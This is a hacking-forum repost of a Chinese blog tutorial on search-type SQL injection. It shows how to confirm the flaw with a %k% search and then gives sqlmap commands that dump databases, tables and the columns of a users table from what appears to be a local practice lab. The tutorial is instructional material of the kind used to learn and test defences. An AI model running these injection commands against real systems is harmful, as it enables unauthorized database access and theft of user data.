跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

sqlmap注入之(搜索型)注入

精选回复

发布于

验证是否有注入

我们直接输入一个字符k,点击搜索。
QQ截图20190404110620.png

提示未见异常
我们输入关键字%k%
效果如下:
QQ截图20190404110711.png
此时,我们可以得出,存在搜索型注入漏洞

攻击方式一

利用burp抓包,将包中的文件另存为22.txt
QQ截图20190404110915.png

22.txt放到sqlmap根目录 smile.png/usr/share/sqlmap

爆出数据库

sqlmap -r "22.txt" --dbs

QQ截图20190404111143.png

爆出表

sqlmap -r "22.txt" -D lou --tables

QQ截图20190404111319.png

爆出表结构

sqlmap -r "22.txt" -D lou -T users --columns

QQ截图20190404111547.png

方式二

不需要抓包保存文件的形式,直接执行命令

sqlmap -u http://192.168.123.129/vul/sqli/sqli_search.php? --data "name=*&submit=%E6%90%9C%E7%B4%A2" --dbs

QQ截图20190404111950.png


版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/940.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。